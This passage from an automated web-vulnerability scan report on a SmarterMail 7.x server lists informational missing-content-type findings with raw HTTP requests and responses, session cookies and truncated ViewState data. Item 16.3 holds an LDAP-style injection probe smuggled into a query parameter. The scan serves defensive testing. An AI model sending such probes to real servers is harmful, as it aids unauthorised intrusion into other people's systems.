User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/UserControls/ThirdPartyComponents/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:29 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 49
Connection: Close

{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

16. Content type is not specified
There are 44 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


16.1. http://vulnerable.SmarterMail 7.x.host:9998//

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   //

Request

GET // HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.2. http://vulnerable.SmarterMail 7.x.host:9998//Main/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   //Main/

Request

GET //Main/ HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:04 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.3. http://vulnerable.SmarterMail 7.x.host:9998//Main/frmEmptyPreviewOuter.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   //Main/frmEmptyPreviewOuter.aspx

Request

GET //Main/frmEmptyPreviewOuter.aspx?type=5faa0382d747b754)(sn=* HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SelectedLanguage=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1293362628","TopBarSection":"UserStorage","RootLPSize":300}

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Sat, 02 Oct 2010 00:41:32 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.4. http://vulnerable.SmarterMail 7.x.host:9998//Main/frmStoredFiles.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   //Main/frmStoredFiles.aspx

Request

GET //Main/frmStoredFiles.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:54 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.5. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/ButtonBarIcons.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/ButtonBarIcons.xml

Request

GET /App_Themes/Default/ButtonBarIcons.xml HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:05 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-wei
...[SNIP]...

16.6. http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/Skin.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /App_Themes/Default/Skin.xml

Request

GET /App_Themes/Default/Skin.xml HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/App_Themes/Default/
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 403 Forbidden
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:05 GMT
Content-Length: 1208
Connection: Close

<html>
<head>
<title>Forbidden</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-wei
...[SNIP]...

16.7. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlert.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Alerts/frmAlert.aspx

Request

POST /Main/Alerts/frmAlert.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlert.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 13532

ctl00%24MPH%24conditiontype_subject=DoesNotEqual&__LASTFOCUS=&ctl00%24MPH%24conditiontype_timeofday=Outside&ctl00%24MPH%24enabled_location=on&ctl00%24MPH%24condition_subject=555-555-0199@example.com&c
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:51 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:51 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.8. http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlertPopup.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Alerts/frmAlertPopup.aspx

Request

POST /Main/Alerts/frmAlertPopup.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Alerts/frmAlertPopup.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 7575

__VIEWSTATE=%2fwEPDwUKMTk5OTU5MTIzMw8WBh4IX19fVGl0bGUFDVJlbWluZGVycyAoMCkeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFggCBQ9kFgICAQ9kFgICAQ9kFgJmD2QWAgIBD2QWAgIBDxYCHgdWaXNpYmxlZ2
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:52 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:52 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html;
...[SNIP]...

16.9. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/frmEvent.aspx

Request

POST /Main/Calendar/frmEvent.aspx?popup=true HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx?popup=true#
x-microsoftajax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Cache-Control: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: vulnerable.SmarterMail 7.x.host:9998
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: SelectedLanguage=; settings=H5GbaO2pH2bvXZExKCiPdHE7axylgs8WH39iPtq7au4%3d; SM5Skin=Default; STTTState=; STHashCookie={"CountsGuid":"1085934378","TopBarSection":"UserContacts"}; ASP.NET_SessionId=qjssfcanzjka5f45mn3elp55
Content-Length: 26574

ctl00%24ScriptManager1=ctl00%24MPH%24ctl00%7Cctl00%24MPH%24lnkRefresh&__LASTFOCUS=&__EVENTTARGET=ctl00%24MPH%24lnkRefresh&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTE5MDk3MzY0MA8WCh4IX19fVGl0bGUFC015IEN
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:22:14 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:22:14 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain;
...[SNIP]...

16.10. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmOverview.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/frmOverview.aspx

Request

POST /Main/Calendar/frmOverview.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmOverview.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 16603

ctl00_MPH_RadSplitter1_ClientState=&__VIEWSTATE=%2fwEPDwULLTE2MzI2MDcxMzkPFgYeCF9fX1RpdGxlBSZNeSBDYWxlbmRhciAtIEZyaWRheSwgT2N0b2JlciAwMSwgMjAxMB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:14 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:15 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.11. http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/javascript:OpenMasterCategoriesPopup()

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/Calendar/javascript:OpenMasterCategoriesPopup()

Request

GET /Main/Calendar/javascript:OpenMasterCategoriesPopup() HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/Calendar/frmEvent.aspx?popup=true
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;

Response

HTTP/2.0 400 Bad Request
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:38:58 GMT
Content-Length: 1212
Connection: Close

<html>
<head>
<title>Bad Request</title>
<style>
   body {font-family:"Verdana";font-weight:normal;font-size: 8pt;color:black;}
   p {font-family:"Verdana";font-w
...[SNIP]...

16.12. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmAdvancedSearchResults.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmAdvancedSearchResults.aspx

Request

POST /Main/frmAdvancedSearchResults.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmAdvancedSearchResults.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 7317

ctl00_MPH_ContactGrid_HiddenLSR=&__VIEWSTATE=%2fwEPDwUJODU0MzcxNDI3DxYEHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYGAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8Da
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:53 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:53 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.13. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendar.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmCalendar.aspx

Request

POST /Main/frmCalendar.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendar.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 14504

ctl00%24TPH%24tsTabs%24SelectedTab=ctl00_TPH_tsTabs_tabDaily&ctl00%24MPH%24hfNewDate=&ctl00_TitleBar_menuCalendarSourceTitle_menuCalendarSource_menuSourceSelf_CB=on&ctl00$MPH$btnNavLeft.x=1&ctl00$MPH$
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:47 GMT
Content-Length: 0

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:48 GMT
X-AspNet-Version: 2.0.50727
Location: /frmError.aspx?aspxerrorpath=/Main/frmCalendar.aspx
Cache-Control:
...[SNIP]...

16.14. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendarSettings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmCalendarSettings.aspx

Request

POST /Main/frmCalendarSettings.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCalendarSettings.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 56817

ctl00_MPH_tfTuesday_SettingText1_ClientState=&ctl00%24MPH%24tfSunday_SettingText1%24dateInput=2010-10-01-08-00-00&ctl00_MPH_tfMonday_SettingText1_timeView_ClientState=&ctl00%24MPH%24tfThursday_Setting
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:24 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:24 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.15. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCompose.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmCompose.aspx

Request

POST /Main/frmCompose.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmCompose.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 7487

ctl00_BPH_menuActions_menuFlags_menuFollowUp_CB=on&ctl00%24MPH%24VisiblePage=ctl00_MPH_pvCompose&ctl00_MPH_RadText_dialogOpener_Window_ClientState=&ctl00%24MPH%24txtBCC=555-555-0199@example.com&ctl00%
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:56 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:56 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.16. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContact.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmContact.aspx

Request

POST /Main/frmContact.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContact.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 17072

ctl00%24MPH%24wucContactInfo%24txtCompanyZip_SettingText=Wiener+Consulting&ctl00%24MPH%24wucContactInfo%24txtPersonNameTitle_SettingText=Peter+Wiener&__LASTFOCUS=&ctl00%24MPH%24wucContactInfo%24txtEma
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:58 GMT
Content-Length: 0

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:39:58 GMT
X-AspNet-Version: 2.0.50727
Location: /frmError.aspx?aspxerrorpath=/Main/frmContact.aspx
Cache-Control:
...[SNIP]...

16.17. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContentFilters.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmContentFilters.aspx

Request

POST /Main/frmContentFilters.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmContentFilters.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 4996

ctl00_MPH_HyperGrid1_HiddenInput=&__VIEWSTATE=%2fwEPDwUKMTU4ODUzMTE0MA8WCh4IX19fVGl0bGUFEUNvbnRlbnQgRmlsdGVyaW5nHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeDlZTX0RvbWFpbkxldmVsaB4EX3NHRmcWAmYP
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:26 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:26 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.18. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmFolderAutoClean.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmFolderAutoClean.aspx

Request

POST /Main/frmFolderAutoClean.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmFolderAutoClean.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 5413

ctl00_MPH_HyperGrid1_HiddenInput=&__VIEWSTATE=%2fwEPDwUKLTIwNTk5OTUyMA8WCh4IX19fVGl0bGUFEUZvbGRlciBBdXRvLUNsZWFuHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeDlZTX0RvbWFpbkxldmVsaB4EX3NHRmcWAmYP
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:27 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:27 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length:
...[SNIP]...

16.19. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMessage.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.SmarterMail 7.x.host:9998
Path:   /Main/frmMessage.aspx

Request

POST /Main/frmMessage.aspx HTTP/1.1
Host: vulnerable.SmarterMail 7.x.host:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMessage.aspx
Cookie: SelectedLanguage=; STTTState=; settings=sbjPsYCOWH%2b2Guc6hfZIwFZrx4oif%2fxXdHydUqFMtxk%3d; STHashCookie={"CountsGuid":"90870410","TopBarSection":"UserTasks"}; ASP.NET_SessionId=c3zrnp3fvjsmao45kfanak55; SM5Skin=Default;
Content-Type: application/x-www-form-urlencoded
Content-Length: 16595

__VIEWSTATE=%2fwEPDwULLTEwODA2NTM4NDAPFgoeCF9fX1RpdGxlZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHhdNZXNzYWdlU3BlY2lmaWNWaWV3VHlwZQUEaHRtbB4IVmlld1R5cGUFBGh0bWwWAmYPZBYCAgMPZBYIAgMPFgIeB1Zpc2
...[SNIP]...

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:28 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Fri, 01 Oct 2010 22:40:28 GMT
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html;
...[SNIP]...

16.20. http://vulnerable.SmarterMail 7.x.host:9998/Main/frmMyAutoResponder.aspx

Summary
